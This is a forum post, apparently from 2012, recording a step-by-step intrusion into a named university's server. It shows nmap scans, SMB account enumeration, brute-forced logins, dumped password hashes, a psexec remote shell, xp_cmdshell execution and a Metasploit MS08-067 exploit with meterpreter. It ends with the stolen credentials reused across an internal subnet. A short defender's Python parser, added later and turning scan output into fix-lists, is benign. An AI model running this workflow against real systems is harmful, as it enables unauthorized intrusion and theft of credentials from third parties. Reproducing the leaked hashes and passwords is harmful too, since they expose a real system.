nmap + msf intrusion into Guangxi Normal University

Posted on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds

root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb   // list the scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// this uses the script to scan for the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser   // scan result

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// view the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ

Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain the user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful

Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds

root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2   // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2

Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds

C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe   // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user'"   // log in remotely as sa and execute a command

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241   // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE

Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds

root@bt:~# msfconsole   // use the ms08-067 vulnerability in msf to overflow the target machine
msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// use the usernames and the obtained hash to try logging in across the whole internal subnet

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)

Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

Attack successful, a simple msf+nmap attack~~
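Added here as a defender's triage example, not part of the original post: a Python parser for the nmap host-script output shown above (smb-enum-shares, smb-pwdump, smb-check-vulns) that turns it into remediation findings, i.e. anonymous share access, blank passwords, LM hashes still being stored (a trailing AAD3B435B51404EE half is the LM hash of an empty string, so the password is 7 characters or fewer) and the missing MS08-067 patch. The sample text is constructed from the values in the post; the function names are my own.

```python
import re

# LM hash of the empty string: pwdump shows it as the second half of the LM
# field whenever the password is shorter than 8 characters.
EMPTY_LM_HALF = "AAD3B435B51404EE"
# Constructed sample, modelled on the "Host script results" blocks in the post.
SAMPLE = """\
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
| smb-check-vulns:
|_  MS08-067: VULNERABLE
"""

def parse_host_scripts(text):
    """Group nmap's '|' / '|_' prefixed host-script lines by script name."""
    scripts, current = {}, None
    for line in (raw.lstrip("|_ ").rstrip() for raw in text.splitlines() if raw.startswith("|")):
        header = re.fullmatch(r"([\w-]+):", line)   # a script header such as 'smb-pwdump:'
        if header:
            current = header.group(1)
            scripts[current] = []
        elif current:
            scripts[current].append(line)
    return scripts

def audit(text):
    """Turn the script results into (severity, finding) pairs for remediation."""
    s, out, share = parse_host_scripts(text), [], None
    for line in s.get("smb-enum-shares", []):        # anonymous (null session) share access
        if not line.startswith("Anonymous access:"):
            share = line
        elif not line.endswith("<none>"):
            out.append(("MEDIUM", f"share {share} allows anonymous {line.rsplit(' ', 1)[1]}"))
    for line in s.get("smb-pwdump", []):             # password hash hygiene
        m = re.match(r"(\S+):\d+ => ([^:]+):", line)
        if m and m.group(2).startswith("NO PASSWORD"):
            out.append(("HIGH", f"account {m.group(1)} has an empty password"))
        elif m:
            out.append(("MEDIUM", f"account {m.group(1)} stores an LM hash (disable LM hashing)"))
            if m.group(2)[16:].upper() == EMPTY_LM_HALF:
                out.append(("LOW", f"account {m.group(1)} password is 7 characters or fewer"))
    for line in s.get("smb-check-vulns", []):        # missing security patches
        bulletin, _, state = line.partition(":")
        if state.strip() == "VULNERABLE":
            out.append(("CRITICAL", f"{bulletin} patch missing"))
    return out
```

Run `audit(SAMPLE)` to get the six findings for the sample; feed it the "Host script results" section of a real scan of your own hosts to get a prioritised fix list.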